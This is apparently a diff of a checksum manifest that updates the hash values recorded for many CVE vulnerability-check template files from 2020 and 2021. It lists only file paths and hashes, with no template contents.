+http/cves/2020/CVE-2020-21012.yaml:87ab2f8b92757c230b9844e2c0ef635bbf1b40e6 +http/cves/2020/CVE-2020-2103.yaml:89ccc1ab063dda127ef925c9da604e29054fb867 +http/cves/2020/CVE-2020-21224.yaml:1865fbdd73d805773546eb3e3dd1909cdbb898e7 +http/cves/2020/CVE-2020-2140.yaml:b8524cdc0dfd47e9c13661319b3847a5506f71da +http/cves/2020/CVE-2020-22208.yaml:cd8900f35785d146aad3943185cfb45370c06146 +http/cves/2020/CVE-2020-22209.yaml:a2992bf512ed40d9b1cdde564fd7ae218f5a0d13 +http/cves/2020/CVE-2020-22210.yaml:9bddb39e2566d09c8c38d78768bbed692ce8037b +http/cves/2020/CVE-2020-22211.yaml:f64edefc09cf567230e3a2b20c59b77767f43d0d +http/cves/2020/CVE-2020-22840.yaml:4fb424adb9ad10b4032699c09dd9bd0f02429899 +http/cves/2020/CVE-2020-23015.yaml:0943914a4d3ce4bff99281a22cf83642dde17085 +http/cves/2020/CVE-2020-23517.yaml:af6efc77a8f02586d2432b80c8a94dc0d2c453e2 +http/cves/2020/CVE-2020-23575.yaml:20ceaa8ee059a7f991f31e4103c006ad4d19eb75 +http/cves/2020/CVE-2020-23697.yaml:3a2db1c3d6d8df4186e3c22027463d1ab0ebf096 +http/cves/2020/CVE-2020-23972.yaml:cc1d0f06b187218b289860ffb1a59cc3a7cabecd +http/cves/2020/CVE-2020-24148.yaml:17cca6eb7fe8af4668bda8f1e3076ca0022d540f http/cves/2020/CVE-2020-24186.yaml:1c20b67e2a6b9a3ce81575579144d9986e7ad7d2 -http/cves/2020/CVE-2020-24223.yaml:a469a19ee4f5edc5b6aee34f03dec3c48da0edfa -http/cves/2020/CVE-2020-24312.yaml:cffa9a93e10b9a22d4ba0295b2a1d35b19dc1191 -http/cves/2020/CVE-2020-24391.yaml:5d0325c062959980e6cabd2a02f2aa7e372bb41f -http/cves/2020/CVE-2020-24550.yaml:c70260bc02ffb16bbc98f96d3c6a2ea0269fbac4 -http/cves/2020/CVE-2020-24571.yaml:0773e9008a1dd7d80c3ebd6c9e868093e6fc7c7d -http/cves/2020/CVE-2020-24579.yaml:4e54658141166df415874ca65461d6e39ab21f4b -http/cves/2020/CVE-2020-24589.yaml:e611cb8d8d5b336f898d148794a0e16a50dc8c86 -http/cves/2020/CVE-2020-24902.yaml:fdc6d201ee540cf8c78bfc02b91faf20911320ab -http/cves/2020/CVE-2020-24903.yaml:c41f75ade1b76701bb1664bef609ab6f5414e8f5 -http/cves/2020/CVE-2020-24912.yaml:da86d2e250e0a5ead3c919ff8c165ec429547ae6 -http/cves/2020/CVE-2020-24949.yaml:7a5a2a3b526f66496ec94bbfbad097c9bd11317a -http/cves/2020/CVE-2020-25078.yaml:233e307ccfc1f0d4229ad2b02aaa0a6b5a13a0e4 +http/cves/2020/CVE-2020-24223.yaml:f2ed5cbe25137f41004fa192baf41308b725c6ad +http/cves/2020/CVE-2020-24312.yaml:fd8c29145150bef2db145099373071dc75e4d213 +http/cves/2020/CVE-2020-24391.yaml:f07f9104e404fcfb08a6d61ec63feec48ece316c +http/cves/2020/CVE-2020-24550.yaml:a5735b6297bc0d2f937582a39b0b4c0cd4c726fe +http/cves/2020/CVE-2020-24571.yaml:b81a18d8ea0eaef23b1a1b5df3322059e815e8e8 +http/cves/2020/CVE-2020-24579.yaml:0d538d4eb6835a95de261f1200c87ae99f97f840 +http/cves/2020/CVE-2020-24589.yaml:c4596af5639a19c0a8db4c0b04608bb0cce75742 +http/cves/2020/CVE-2020-24902.yaml:3a6d04b115badb09d459f334b93f946d4a095d48 +http/cves/2020/CVE-2020-24903.yaml:d3195b13ca5c965a4029c6ca9616704a2297c26f +http/cves/2020/CVE-2020-24912.yaml:1cf98456e39e6b6577fbdacc57949a04fa241f1e +http/cves/2020/CVE-2020-24949.yaml:e144d3fcfe63d0010b2fe444f6df298bbf70e48b +http/cves/2020/CVE-2020-25078.yaml:ca630a42165fead69376d51953ab4fcf9d42c059 http/cves/2020/CVE-2020-25213.yaml:4d9024a004a64e200a2d3c796cf3000830c4d9a3 -http/cves/2020/CVE-2020-25223.yaml:2a57962784872f67e7f1ae7717c366146deff27f -http/cves/2020/CVE-2020-25495.yaml:ab6a4eeed32d149381fe394912d28c4ae5912f5c -http/cves/2020/CVE-2020-25506.yaml:a8c432df51662a75fb0cb4139861dfbaecf88243 -http/cves/2020/CVE-2020-2551.yaml:84b7f113ff2d113971fe929b309febf84d4088ec -http/cves/2020/CVE-2020-25540.yaml:f818ddf5de05a1997fb3e8ec3f34088dc7af8727 -http/cves/2020/CVE-2020-25780.yaml:574646b9bd5c650ad63d2b056508116d838ace54 -http/cves/2020/CVE-2020-25864.yaml:81804a8a5870d68de346cfe6c6a973ca13b906e9 -http/cves/2020/CVE-2020-26073.yaml:092608f10cfbec677347eab13afc0b2f1b3860e7 -http/cves/2020/CVE-2020-26153.yaml:a5a1ad587241f67080c2203f63dca0220afe1427 -http/cves/2020/CVE-2020-26214.yaml:b69d922f61e54ed48791a927537c288d2b24a80f -http/cves/2020/CVE-2020-26217.yaml:f10cb215f12458bb66bb0bc9548b31e25b7abd18 -http/cves/2020/CVE-2020-26248.yaml:3ec2eeb375260c9afcc411450f044f43929ceb74 -http/cves/2020/CVE-2020-26258.yaml:c03cd54ff7b1df4df6cf83929265811c22862afe -http/cves/2020/CVE-2020-26413.yaml:ed8b1903bf507377036d5243daae3d086554390e -http/cves/2020/CVE-2020-26876.yaml:b0e45fd2e0f4f94da93ff1b802d0f4221f511c9f -http/cves/2020/CVE-2020-26919.yaml:39845be60bfc669c019caad1feab162302d0b3c8 -http/cves/2020/CVE-2020-26948.yaml:71ae77b1771b70e3e8641f7ff7e9d03cfdedb6d1 -http/cves/2020/CVE-2020-27191.yaml:c2010001ed0c30496285196a0dc59af5ed2590c7 -http/cves/2020/CVE-2020-2733.yaml:cca3f74a752e7503134b2474c5b4e62837c42aaa -http/cves/2020/CVE-2020-27361.yaml:00837d374b934474c9062da012f4b4a784ce6e8f -http/cves/2020/CVE-2020-27467.yaml:700f8d4063e2abe6d0ffa111c2a4796846679212 +http/cves/2020/CVE-2020-25223.yaml:38d0c1d585a11d02ae7c026e1a2247f7021a966c +http/cves/2020/CVE-2020-25495.yaml:35789b68e09576e3bfaca3e576bdce4dce60bb45 +http/cves/2020/CVE-2020-25506.yaml:396258dcc114c626e6d8e08e6066b1a9dd162c85 +http/cves/2020/CVE-2020-2551.yaml:643faafb15a6b1cd435638f4a5c3f77ea039a4de +http/cves/2020/CVE-2020-25540.yaml:c618f2fd30c24869095bdaffdb5de169264032a6 +http/cves/2020/CVE-2020-25780.yaml:ab3201e7519c8e94503f263d6c0160ebb2db3561 +http/cves/2020/CVE-2020-25864.yaml:434bdf4c0d836e60c43a6e46ab3d055a66e2ba3f +http/cves/2020/CVE-2020-26073.yaml:da7e71ae9e9edf821e065ba7e37d5639f9a6945c +http/cves/2020/CVE-2020-26153.yaml:c7856dde436fa9495c11938a2916a5a9c914c143 +http/cves/2020/CVE-2020-26214.yaml:b53cf2992c5c4e035f879a3f339e155362f8f0e3 +http/cves/2020/CVE-2020-26217.yaml:e9f973b191521ff048fab67eb0ccbee1c2c11bb9 +http/cves/2020/CVE-2020-26248.yaml:7c843970292a6f54db8c0eaf72fc7a8d761e07e1 +http/cves/2020/CVE-2020-26258.yaml:cf60935bd6965d1c14a362c0ed4020030819a0a5 +http/cves/2020/CVE-2020-26413.yaml:cf99dbc13fdaaef673a3af5663243d7d0eab5b0c +http/cves/2020/CVE-2020-26876.yaml:3c4328aa2a4954eb2322e9605ae98467e7a4193a +http/cves/2020/CVE-2020-26919.yaml:4a4ceca25e41a1f5c8082a4e94e31463ba4a6382 +http/cves/2020/CVE-2020-26948.yaml:aa8fbab5959265f2826eef86322cf3553e3edfd0 +http/cves/2020/CVE-2020-27191.yaml:814d11cda1544431161af2fb4c4c9f39ceb128e4 +http/cves/2020/CVE-2020-2733.yaml:97575ea34161101ce6cec637bd21b0caee34d9de +http/cves/2020/CVE-2020-27361.yaml:25491454af03eaa6ab1cda679e7b2a0fb9741279 +http/cves/2020/CVE-2020-27467.yaml:6f5646808df8cf2cfaaff65e2332aa5c37fb20f4 http/cves/2020/CVE-2020-27481.yaml:819296335f57f930b2f119b2b25cf339ca874f7d -http/cves/2020/CVE-2020-27735.yaml:dfa87ed26f568eb5d42c47a9d891ef9b81b90a16 -http/cves/2020/CVE-2020-27866.yaml:a282df4a75e6224728f5ba0bab86fbae9ec1129c -http/cves/2020/CVE-2020-27982.yaml:a2ab2eacee0214b556b607660197d3f9d50e2649 -http/cves/2020/CVE-2020-27986.yaml:136fd3ca4193eb4e0712595bbb6ed7aef321be8d -http/cves/2020/CVE-2020-28188.yaml:c420030e17aa66104914b27eeae8865eebd61e0b -http/cves/2020/CVE-2020-28208.yaml:bf13f2a4afa828e1d49e0fac6c02758ea1c84e09 -http/cves/2020/CVE-2020-28351.yaml:19143ce3ec0a756d2f308f92b27cd5c5d2bd3a28 +http/cves/2020/CVE-2020-27735.yaml:1661a3860c01da77fe074a3d0b617fc75660aed9 +http/cves/2020/CVE-2020-27866.yaml:8e4b2bc4dcf5cbc4790b8cfd8a3358544b7e3006 +http/cves/2020/CVE-2020-27982.yaml:917a4e3b6dbb677a4f42f93e0f01b2943130d78b +http/cves/2020/CVE-2020-27986.yaml:8f894fc1b1cd84b216b9b456cedce0d67265d42c +http/cves/2020/CVE-2020-28188.yaml:c5995d900cdd4d56b18957a726b9564bb9ea8bcc +http/cves/2020/CVE-2020-28208.yaml:fefcdb202255b65f6d865ade2cbf1c4232335a24 +http/cves/2020/CVE-2020-28351.yaml:8ff8d3c0b6b2ac0dad2393945e9c328596dcec6a http/cves/2020/CVE-2020-28871.yaml:44e214f67a2e2a9c76640aef3570266c3320b0bb -http/cves/2020/CVE-2020-28976.yaml:2f6d709ee8879ee4c78886febdff47dfd80c3098 -http/cves/2020/CVE-2020-29164.yaml:d9a5213b36770d24a091e7a411d4c04e7a98b8bf -http/cves/2020/CVE-2020-29227.yaml:e21af265bf58f3f2ad9598b7d8c12c30535023c8 -http/cves/2020/CVE-2020-29284.yaml:28aeaceda74b7c3ad0dfd0d0284ece3f23de2df7 -http/cves/2020/CVE-2020-29395.yaml:76621812638940704de9abd94951845aeb70fcf0 -http/cves/2020/CVE-2020-29453.yaml:c0d0b4be27d1166ea3636db957d1542817294cd0 +http/cves/2020/CVE-2020-28976.yaml:ebb8ee604b52f46b3cc2461c5a39c7af7e517dfc +http/cves/2020/CVE-2020-29164.yaml:874cf5c96b6d3833d8bd11bd60498fda04d16a73 +http/cves/2020/CVE-2020-29227.yaml:22ff92b2e33f5bb720743646d2167308726a5976 +http/cves/2020/CVE-2020-29284.yaml:b8573a8c7eb2252e3a96372683f2dd71892bd577 +http/cves/2020/CVE-2020-29395.yaml:8f7bb30917c724db55d2614b6f97911853f8ccdb +http/cves/2020/CVE-2020-29453.yaml:d9f0f7264f2b9505e6f49c9b40d2e1d91024ec63 http/cves/2020/CVE-2020-29583.yaml:7b8ae8deb15e6f578850b09d5aef7d13112afb7f -http/cves/2020/CVE-2020-29597.yaml:744afc91d498b4c3c76f36e2b94e5f5e0567abcd -http/cves/2020/CVE-2020-3187.yaml:f24c047caafa8d2a390e6a554000304a8348b05d -http/cves/2020/CVE-2020-3452.yaml:e3db6c1ab42a97e0774b4c1806c58a5bac20dbe2 -http/cves/2020/CVE-2020-35234.yaml:852a543f982e34fd1846ba14ae59070d557f172c -http/cves/2020/CVE-2020-35338.yaml:2e7aaed45f07d8098a229e448687ee9db8b7aaa5 -http/cves/2020/CVE-2020-35476.yaml:71d35fb39d1383b19963d35da152974c7ee9a952 -http/cves/2020/CVE-2020-35489.yaml:4732a27b7f915e00169285521584965b6cd3e131 -http/cves/2020/CVE-2020-35580.yaml:73fe325bfb19913cf3ece302723108eab8fb4aee -http/cves/2020/CVE-2020-35598.yaml:63f63712a0d0fc827b657a6874aeb769a05f9709 -http/cves/2020/CVE-2020-35713.yaml:f18517b463f20d699c1d3f0da2383c65959c14ef -http/cves/2020/CVE-2020-35729.yaml:3050faef24b95a822608970cf642a4cfb751060e -http/cves/2020/CVE-2020-35736.yaml:d36b238a08c20a41101dc919c09b80ec5e04b7cd -http/cves/2020/CVE-2020-35749.yaml:ca477f23914de62d3a525c8ac9c6c0af1c8ae3bf -http/cves/2020/CVE-2020-35774.yaml:972b0b3945e4543684ff77dc7203b5663429b04c -http/cves/2020/CVE-2020-3580.yaml:e640aa3625d349d514389a8c50b27cd433fb0985 -http/cves/2020/CVE-2020-35846.yaml:c11ad707d109784458dc81e0ea52715d146f1872 +http/cves/2020/CVE-2020-29597.yaml:54a7fa6965f238640f06a82877b049501398d7ae +http/cves/2020/CVE-2020-3187.yaml:e73c809964d747f0a145b7aa556222795fa3262b +http/cves/2020/CVE-2020-3452.yaml:4ad1f8884613f3aaee9a06b8f1bcfb8ec38e8dad +http/cves/2020/CVE-2020-35234.yaml:937dc6e5fa37b2b849e0fe6d52a3a32888d35070 +http/cves/2020/CVE-2020-35338.yaml:646e804f44be0a4d6d458ecb31b1df5083d0cb2d +http/cves/2020/CVE-2020-35476.yaml:ebb28e731347c0dca9b9df798b16266a5f615654 +http/cves/2020/CVE-2020-35489.yaml:e994e76b77f5b921b8131fa3cbbae308173e9e7d +http/cves/2020/CVE-2020-35580.yaml:cecf43765dd5d8a139f7685dafb1284b1625ccc7 +http/cves/2020/CVE-2020-35598.yaml:26aa01e9cb29780a97c513f627a2c4389b875ae1 +http/cves/2020/CVE-2020-35713.yaml:09a8a6a989acb5dba1f03113cc2cb5d264e81935 +http/cves/2020/CVE-2020-35729.yaml:cf2134b8fdd7d5e04827207b8e1f6fff4eab75c9 +http/cves/2020/CVE-2020-35736.yaml:7fc206b9e395ecbc0d626cdb13d75425a5f62653 +http/cves/2020/CVE-2020-35749.yaml:ad4e4a38e819424e214cc3f846d93de37b3b249d +http/cves/2020/CVE-2020-35774.yaml:85f6e825c830a5bcb485dd8c7044bd83217236f3 +http/cves/2020/CVE-2020-3580.yaml:b5087fb7878edac4a4c817a9722bb3d67973e48d +http/cves/2020/CVE-2020-35846.yaml:2309466068e1246a5997c833067c1ac84727b1eb http/cves/2020/CVE-2020-35847.yaml:73a9bac50937850f6b20733631a23794be97ad16 -http/cves/2020/CVE-2020-35848.yaml:8d913ecc9f2a82c81c7ac3c15a2aaaf95068390b -http/cves/2020/CVE-2020-35951.yaml:c2c755582bda49a37ccaf342009729bf933b952b +http/cves/2020/CVE-2020-35848.yaml:f66a3159e5a5993680643ed6ab7b66a8a9fff1f7 +http/cves/2020/CVE-2020-35951.yaml:a62565bda3f7f8e045f5bb320de8bae9cd7f17a8 http/cves/2020/CVE-2020-35984.yaml:08e9c5769b7e18bfa8074bb1e7f57fde7ea20675 -http/cves/2020/CVE-2020-35985.yaml:4911b2b952c773dd19c15cfb95cf4d1776a05fa1 +http/cves/2020/CVE-2020-35985.yaml:18bc48193071badac0906b2c3dcc1f38fb929916 http/cves/2020/CVE-2020-35986.yaml:ca00798502f9fda343568d3d8cc9ca014e29b825 -http/cves/2020/CVE-2020-35987.yaml:4c148f648ae37b52bdbda470e73081d526adfd95 -http/cves/2020/CVE-2020-36112.yaml:2393d1a0fb2bddea1caa59cfcb0c9eb9996038cc -http/cves/2020/CVE-2020-36289.yaml:3afed85c52fd88b42aa75768755e5805e76e5f14 -http/cves/2020/CVE-2020-36365.yaml:1a981b021d0172219e2c629cd07db4c9ff0825ab -http/cves/2020/CVE-2020-36510.yaml:6eee93819f915b76e954cc498be12ead6b6b2875 -http/cves/2020/CVE-2020-4463.yaml:4b36f15af2e3b56fa939934d399ab59a39cc6247 -http/cves/2020/CVE-2020-5191.yaml:4dea5beb9fb536ca9154b907737df36cde3edc22 -http/cves/2020/CVE-2020-5192.yaml:a0ba844f5648ecce935a5a69019594737d3d1041 -http/cves/2020/CVE-2020-5284.yaml:fd28857c875469ccf2e3646795d803241bf08b9e -http/cves/2020/CVE-2020-5307.yaml:a46eb629d6469f3e0911dd71889a5ce8933315cf -http/cves/2020/CVE-2020-5405.yaml:d4d234f91250a30e175feb786ac2eaf8b5f42c47 -http/cves/2020/CVE-2020-5410.yaml:fbb2219cc2e21573b417d1af08e80271f2365ba4 -http/cves/2020/CVE-2020-5412.yaml:237d89fef048fe73cadaa0f3faa3d8625506d0bd -http/cves/2020/CVE-2020-5775.yaml:4914818159b4e8e4849416cce39c6274b0e16e54 -http/cves/2020/CVE-2020-5776.yaml:d1edb9bbfb567b9a7a98a8710be720b16bf8fc87 -http/cves/2020/CVE-2020-5777.yaml:228b68f33ac36f720863ca3ef829d56384fdf195 -http/cves/2020/CVE-2020-5847.yaml:dc42d68c6a9630249434129ac2616779e16dd85b -http/cves/2020/CVE-2020-5902.yaml:e6eb7cae1e2f8d98e6a2a53a5be418d592f04dac -http/cves/2020/CVE-2020-6171.yaml:3619687ec22c65d883542ef07c3a708f5aa239dd -http/cves/2020/CVE-2020-6207.yaml:6103a422a05d72c06cf1620a3352d325fd8735d6 -http/cves/2020/CVE-2020-6287.yaml:3a00bd9f2d785de0fc2325833e7d3e461fd7adab -http/cves/2020/CVE-2020-6308.yaml:0bbc255f49f8a4af0aedfe228686962ce108848c -http/cves/2020/CVE-2020-6637.yaml:2b6e354bca97b14ee1c2433e7bcc2a7f5dd41160 -http/cves/2020/CVE-2020-7107.yaml:7d6f8270dd46d533393a9d873d719fbea9c186d1 -http/cves/2020/CVE-2020-7136.yaml:75f471d9920ad33144c3daaac32274b50be78e76 -http/cves/2020/CVE-2020-7209.yaml:46e81cfc1d21cacd5b26966175b41152b7060172 -http/cves/2020/CVE-2020-7318.yaml:574bf80b59dafea2bce4fd40b86583ee531cc608 -http/cves/2020/CVE-2020-7796.yaml:30c5b7ec2674469cccaa7d014863fd774b797cf7 -http/cves/2020/CVE-2020-7943.yaml:de021dc632a1da65a390f2806206634aa5716841 -http/cves/2020/CVE-2020-7961.yaml:8585b3740108a741b4dbe0317e718ca726b5b155 -http/cves/2020/CVE-2020-7980.yaml:58867ed84fdb0ce44e916d65101931b1eaeb14ab -http/cves/2020/CVE-2020-8115.yaml:fb900dd956823348082e5500198e55ace880e7c4 -http/cves/2020/CVE-2020-8163.yaml:ab3c9c8e0253d82a5f44bb4dda8560a668784f6a -http/cves/2020/CVE-2020-8191.yaml:48c47c818377e95a6010c4da646540b4e4205bc8 -http/cves/2020/CVE-2020-8193.yaml:564dc6b0b6b8824dff4152ee61bfb731cf9ea77f -http/cves/2020/CVE-2020-8194.yaml:78274a3c7ba759e79d61d8959ea4d966a24165cf -http/cves/2020/CVE-2020-8209.yaml:05fb8d5e73e86ccff0874b0c5af85d3cf7798314 -http/cves/2020/CVE-2020-8497.yaml:bf3b609af4b64f0ff659c1fd2ae541d7bbec5d13 -http/cves/2020/CVE-2020-8512.yaml:09338616da921c2de7513c50c614168192399f68 -http/cves/2020/CVE-2020-8515.yaml:231b58d28a349c399c416e741504ab485d1ef5f3 -http/cves/2020/CVE-2020-8641.yaml:3425c472418b778fac7bb90d64e469f8370721d0 -http/cves/2020/CVE-2020-8644.yaml:b2288d0ff157b7a3f4f45943e65716cc835f4215 -http/cves/2020/CVE-2020-8654.yaml:e029f02c5012e18159b2646764825c585d2c7461 -http/cves/2020/CVE-2020-8771.yaml:e640be274e5cac8a4bf9fbcae61c75f28de53683 -http/cves/2020/CVE-2020-8772.yaml:60cbd2c28e29fcd71955899ba05675d6bfa34ade -http/cves/2020/CVE-2020-8813.yaml:f1a13dd5798ef59bef145a4c8af3ed57a6bc98ec -http/cves/2020/CVE-2020-8982.yaml:bd72a3f70ba3c9de9c934829bbbd5c9a5ddfc05c -http/cves/2020/CVE-2020-9036.yaml:d66f740f315552dd4195e681ad542f0a5e641ab0 -http/cves/2020/CVE-2020-9043.yaml:a971b3562a4724e6ccf496d17a1aeb8d705629b8 -http/cves/2020/CVE-2020-9047.yaml:5b5655c9ee8053ff41dd1308d47b6cd72afdbeaf -http/cves/2020/CVE-2020-9054.yaml:76f13d034b100fba280b8f55aee8d2c57d55b5b5 -http/cves/2020/CVE-2020-9315.yaml:6d6bc56300bd98265babee79c4fff34f29b76da4 -http/cves/2020/CVE-2020-9344.yaml:2c4c3703c4580f4f8d301159231e04efc580b242 -http/cves/2020/CVE-2020-9376.yaml:2428ed0aa81690ba5ddb45aa098bd575dcec5cfb -http/cves/2020/CVE-2020-9402.yaml:783b125c842a63c1a716a4530fd54b53107a1a78 -http/cves/2020/CVE-2020-9425.yaml:032992981422b358f2f018041803ce62322e31f7 -http/cves/2020/CVE-2020-9483.yaml:c8335374b114ceb785b233d3f101937b89f63ed7 -http/cves/2020/CVE-2020-9484.yaml:dff680405eeabc12f885263c35935251deb0917c -http/cves/2020/CVE-2020-9496.yaml:52925a55de5ae997f8cb6df76a3161f4dd13a50c -http/cves/2020/CVE-2020-9757.yaml:598424991dde28fe6eec8c370998f695df86a66b -http/cves/2021/CVE-2021-1472.yaml:286ddb8ab4b69313cc896cdd4e78d263170cce19 -http/cves/2021/CVE-2021-1497.yaml:7089f7073bbf30d5c239989a0c37cd6056c64999 -http/cves/2021/CVE-2021-1498.yaml:818733cb47e5e6649faf935ccd1e380241b00ce6 -http/cves/2021/CVE-2021-1499.yaml:e1814a0900cbd51312c5f29fa97a5578fbcd41e3 -http/cves/2021/CVE-2021-20031.yaml:9754993b66765cc4da9f03db3768a51cb85b8ec9 -http/cves/2021/CVE-2021-20038.yaml:c0a958b7302b6bc31ada4e4bbc53f678a180d3f0 -http/cves/2021/CVE-2021-20090.yaml:6315bc6988ca561b9e595fae0d934a079cd115c2 -http/cves/2021/CVE-2021-20091.yaml:00bef44602cb0afd5c6f7110193c748ab8f9121d -http/cves/2021/CVE-2021-20092.yaml:66fcc9ce5345c10015c65dda4176776914aa3cf8 -http/cves/2021/CVE-2021-20114.yaml:c373430f3c21e58010cf68b2bd8f1706b50d7977 -http/cves/2021/CVE-2021-20123.yaml:2c41fae1cefc86cc0a2ed56e4686fcac8a7c01d5 -http/cves/2021/CVE-2021-20124.yaml:a26a6dbc033f68987e7e1e360b696d1f42621f28 -http/cves/2021/CVE-2021-20137.yaml:2b825f3c77f26070275c007e06b25a4b236a5c7c -http/cves/2021/CVE-2021-20150.yaml:e5b752a071d20a95abd95a4040913c3a4a6d852c -http/cves/2021/CVE-2021-20158.yaml:3d91d16ffa0d257fc57252fb93df56d8514f535f -http/cves/2021/CVE-2021-20167.yaml:6070619157ef131d41645acd1fddd539260f5a0a -http/cves/2021/CVE-2021-20323.yaml:453ad509d1e3313a76701dea9715528474a5f896 -http/cves/2021/CVE-2021-20792.yaml:fe26088f15c36c470344a6d9a08635f750f9c1d1 -http/cves/2021/CVE-2021-20837.yaml:239be295d2710ff39efd694d03685e46d0d0d372 -http/cves/2021/CVE-2021-21087.yaml:e152b1becc0f596e04db1e40e3eeb12388af0484 -http/cves/2021/CVE-2021-21234.yaml:7da9df3b0904fed21fc6f959bc89df8c309bb8fd -http/cves/2021/CVE-2021-21287.yaml:6697278beb5cd474625d8e53d5c239642f2a10b1 -http/cves/2021/CVE-2021-21307.yaml:669c74f41e5e5c9a8da1c1c5c36f10f2444eb29f -http/cves/2021/CVE-2021-21311.yaml:aaa8c235660a9a6dd325f2758a0eec0094e73ecd -http/cves/2021/CVE-2021-21315.yaml:053f74ab8294ac172be4daeb83b763bfd89dbe1e +http/cves/2020/CVE-2020-35987.yaml:39457d152e6b445117e8e6a8f9ac69ac814fce87 +http/cves/2020/CVE-2020-36112.yaml:84c4a3fe568457619bbd3b9f2a2dc07652994cb9 +http/cves/2020/CVE-2020-36289.yaml:124d2852a68f28e3201c2681e736f39bdf7c18f6 +http/cves/2020/CVE-2020-36365.yaml:088ccafcea98bab7c51e807e94467d1549a16b66 +http/cves/2020/CVE-2020-36510.yaml:469748cd6c0714e66affc00be629ca04d1afb72b +http/cves/2020/CVE-2020-4463.yaml:7d52e090808767074f59e5f5f5f9907d3cc40f47 +http/cves/2020/CVE-2020-5191.yaml:9577f9da56729f6b82a0d318dbae740571f03717 +http/cves/2020/CVE-2020-5192.yaml:b01f642a5838021601ebdd68fcd4d0865f08e899 +http/cves/2020/CVE-2020-5284.yaml:d0fbbf58aab5a4492d00aacf6da503441457d733 +http/cves/2020/CVE-2020-5307.yaml:bf7849840dba7a90c34daa4804038c327a1c2e61 +http/cves/2020/CVE-2020-5405.yaml:04ab3fc50a351fd0f1ba25cca058457f848014bf +http/cves/2020/CVE-2020-5410.yaml:4ee4641c1f0af0990ddb725197a0ad43a48969c5 +http/cves/2020/CVE-2020-5412.yaml:4d315d9a47b262f5282bc1aada222206b763e741 +http/cves/2020/CVE-2020-5775.yaml:772cc1acae21cdabf45a291d55bafc7c31dc5836 +http/cves/2020/CVE-2020-5776.yaml:8fbf8727520fcbf452f16756c5b85fcd1cfcb66d +http/cves/2020/CVE-2020-5777.yaml:92b78cb0999fdb145393286e2d0f4e0a3ce6da5b +http/cves/2020/CVE-2020-5847.yaml:0594c7b51806166e07bf14ec02c569618707b818 +http/cves/2020/CVE-2020-5902.yaml:4b8722a05cdd8c3f62933875dfe80712e371bd27 +http/cves/2020/CVE-2020-6171.yaml:70552a29b9a3b9cab5993397e02933247b6bbd06 +http/cves/2020/CVE-2020-6207.yaml:181def309a8ab1fb4cb5a521f0d9ecac5d7584c0 +http/cves/2020/CVE-2020-6287.yaml:749268e2686c820c4413f6b8f8ae5072ba494967 +http/cves/2020/CVE-2020-6308.yaml:5d11fc97612f9b3fbb408d304680573ca3061ee0 +http/cves/2020/CVE-2020-6637.yaml:60caf15cceb321c1572023abfaa3c562b040f468 +http/cves/2020/CVE-2020-7107.yaml:d14bc95937c137ccaaca0e6c7574a423810151e0 +http/cves/2020/CVE-2020-7136.yaml:08eede99c8a6a82c138ef9ebca48c4dce093bfa2 +http/cves/2020/CVE-2020-7209.yaml:cdaaeb68436b206b47b84cd518cbdc4f8672b8f0 +http/cves/2020/CVE-2020-7318.yaml:1c5da9c79e5e70399503e21ca2adf4c666bb17e5 +http/cves/2020/CVE-2020-7796.yaml:224fbd9cd375b2ba0533aecc743825918ef57e3c +http/cves/2020/CVE-2020-7943.yaml:b6733d57a42eeedf519decd0371f4648fe1d90ef +http/cves/2020/CVE-2020-7961.yaml:6ca7da6d6392d6fe81486cdf44d510bf3f3cd574 +http/cves/2020/CVE-2020-7980.yaml:ba81023dda2bc966912f8637c244f36a58044180 +http/cves/2020/CVE-2020-8115.yaml:5271f8ffb69ef9921a31a8a7f1f34a1dfd08ef4e +http/cves/2020/CVE-2020-8163.yaml:7171ee4084b2fcaa7fd124d2930013e429ba8ed7 +http/cves/2020/CVE-2020-8191.yaml:a1a9dcf10644091fb61d2f1351b53dca84ff61ed +http/cves/2020/CVE-2020-8193.yaml:64895613e2cf935f102e19cebe96848800eb272a +http/cves/2020/CVE-2020-8194.yaml:b9fa664699304d1264b6e9e87e69c48f699ae28b +http/cves/2020/CVE-2020-8209.yaml:b5270c1bbfba7666fea6d359a7cecb8e13b1d8e3 +http/cves/2020/CVE-2020-8497.yaml:4f2857cfa785f6d14e2a3752d139aa14bb280e48 +http/cves/2020/CVE-2020-8512.yaml:79326f4c493e67c5557ab3204156c4e6e625a478 +http/cves/2020/CVE-2020-8515.yaml:5b37058789f80af6b18b228979d1e33e43bebed7 +http/cves/2020/CVE-2020-8641.yaml:bc3d8f17b7d9ec334938149ba0212c49fbb789cc +http/cves/2020/CVE-2020-8644.yaml:42628d53a338c0a82115ad6b375ef3ec0c192f05 +http/cves/2020/CVE-2020-8654.yaml:1072bf990e0bedf2b70878175f67cb53c368c34a +http/cves/2020/CVE-2020-8771.yaml:cd0b160c11bddd16d8c28e4b4744850fc4276f5d +http/cves/2020/CVE-2020-8772.yaml:223c955b43d4767ddeeeb27086c43ebf8de7676b +http/cves/2020/CVE-2020-8813.yaml:03c0f4c46e2bcafa34d5cc402a7b79123a382235 +http/cves/2020/CVE-2020-8982.yaml:cfb3cc8a5eaadd8e62a39527df15fda4ce4743c8 +http/cves/2020/CVE-2020-9036.yaml:f7321772f0596da7d138cae5a32950ee91944b9b +http/cves/2020/CVE-2020-9043.yaml:1c6702097958a4b06fb2ffc273eb05b3bb07d344 +http/cves/2020/CVE-2020-9047.yaml:0a2cd22f6ee3bf3238a3d2ee459f0b5f37e0fa52 +http/cves/2020/CVE-2020-9054.yaml:066d4a529d0949b0576e8f19bfa429ee9c2abeab +http/cves/2020/CVE-2020-9315.yaml:c97befe58175a096ea008f77dcd49b19f7e15176 +http/cves/2020/CVE-2020-9344.yaml:c59de4dfa247cd92fafee071947d0f695df59425 +http/cves/2020/CVE-2020-9376.yaml:4392edadfcdfc3777b7290330086505c453c54b4 +http/cves/2020/CVE-2020-9402.yaml:f0deb82f8cb18e23ac95861debee062805503001 +http/cves/2020/CVE-2020-9425.yaml:f1cfca6ed80d28905d67fdb8a94dc03ae623c215 +http/cves/2020/CVE-2020-9483.yaml:d0b2210277276dcb6aa4e4562333d9aee1009728 +http/cves/2020/CVE-2020-9484.yaml:013ff9c58358b9489c766d8360ec12f98df126b7 +http/cves/2020/CVE-2020-9496.yaml:5293695b35e5bb7abf39dd04840e4d6cf553e7eb +http/cves/2020/CVE-2020-9757.yaml:dd36cec8d0bf10e4d8b70aebc326077a2445bfc8 +http/cves/2021/CVE-2021-1472.yaml:ea2f6f983ecccc26ac2c17bddfabe06fc0cfd8ec +http/cves/2021/CVE-2021-1497.yaml:211610c83957010dc0216917475cebaf97388cd5 +http/cves/2021/CVE-2021-1498.yaml:fd4df3437cf84cdefa4ba87c2fa1b716c42cd1cd 